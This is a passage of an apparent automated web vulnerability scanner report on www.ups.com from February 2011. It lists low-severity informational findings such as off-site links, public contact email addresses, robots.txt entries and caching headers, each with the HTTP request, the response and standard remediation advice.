The response contains the following links to other domains:

Request

GET /content/us/en/shipping/index.html?WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58294


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.38. http://www.ups.com/content/us/en/shipping/time/service/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/shipping/time/service/index.html?WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56144


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.39. http://www.ups.com/content/us/en/siteguide/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/siteguide/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.40. http://www.ups.com/content/us/en/tracking/fgv/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/tracking/fgv/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/tools/fgv/index.html" target="_blank">Learn More<img src="/img/1.gif" alt="" width="3" height="8" border="0">
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="https://fgv.ups-scs.com/fgv/admin_login.build_logon">Request access to Flex Global View</a>
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="https://fgv.ups-scs.com/fgv/admin_login.build_logon" target="_blank">Current customer log-in<img src="/img/1.gif" alt="" width="3" height="8" border="0">
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/transportation/">Transportation and Freight</a>
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/logistics/">Logistics and Distribution</a>
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/international/">International Trade</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.41. http://www.ups.com/content/us/en/tracking/quantumview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/tracking/quantumview/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45960


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.42. http://www.ups.com/content/us/en/tracking/tools/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/tracking/tools/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36524


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.43. http://www.ups.com/dropoff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /dropoff?loc=en_US&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30359


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.44. http://www.ups.com/sf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /sf

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /sf?loc=en_US&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15216


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.45. http://www.ups.com/upsmobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /upsmobile/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /upsmobile/?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 10761
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


...[SNIP]...
</span><a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336377331"><span style="color: #330000">
...[SNIP]...

7. Email addresses disclosed
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.ups.com/WebTracking/track

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /WebTracking/track

Issue detail

The following email address was disclosed in the response:

Request

GET /WebTracking/track HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A
href="mailto:totaltrack@ups.com">totaltrack@ups.com</A>
...[SNIP]...

7.2. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...

7.3. http://www.ups.com/content/us/en/contact/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34848


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<a href="mailto:fraud@ups.com">
...[SNIP]...

7.4. http://www.ups.com/content/us/en/resources/ship/fraud.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63878


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...

7.5. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A href="mailto:webmaster@ups.com">webmaster@ups.com</A>
...[SNIP]...

8. Private IP addresses disclosed
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


8.1. http://www.ups.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script type="text/javascript" src="/assets/ql/quicklinks.js?V=10.7.1.0">
...[SNIP]...

8.2. http://www.ups.com/content/us/en/index.jsx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /content/us/en/index.jsx?WT.svl=BrndMrk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 123916


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script type="text/javascript" src="/assets/ql/quicklinks.js?V=10.7.1.0">
...[SNIP]...

9. Robots.txt file
There are 2 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


9.1. http://www.ups.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:14:30 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:05:11 GMT
Accept-Ranges: bytes
Content-Length: 166
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/preferred/lws_2.html
Disallow: /content/us/en/preferred/lws_1.html
Disallow: /content/us/en/preferred/lws_index.html
Allow: /


9.2. https://www.ups.com/myups/registration

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/registration

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:16:37 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 15:40:21 GMT
Accept-Ranges: bytes
Content-Length: 163
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/shipping/lws_2.html
Disallow: /content/us/en/shipping/lws_1.html
Disallow: /content/us/en/shipping/lws_index.html
Allow: /


10. Cacheable HTTPS response
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


10.1. https://www.ups.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ups.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:16:04 GMT
Server: Apache
Last-Modified: Wed, 19 Mar 2003 16:32:36 GMT
Accept-Ranges: bytes
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=65
Connection: Keep-Alive
Content-Type: text/plain


10.2. https://www.ups.com/homepage/ddhandler/handler.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:16 GMT
Server: Apache
Content-Length: 167
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.ups.com/">
</head>
<title>UPS.com</title>
<body>
Forwarding to selected URL...
</body>
</html>

11. HTML uses unrecognised charset

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ups.com
Path:   /sf

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /sf?loc=en_US&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
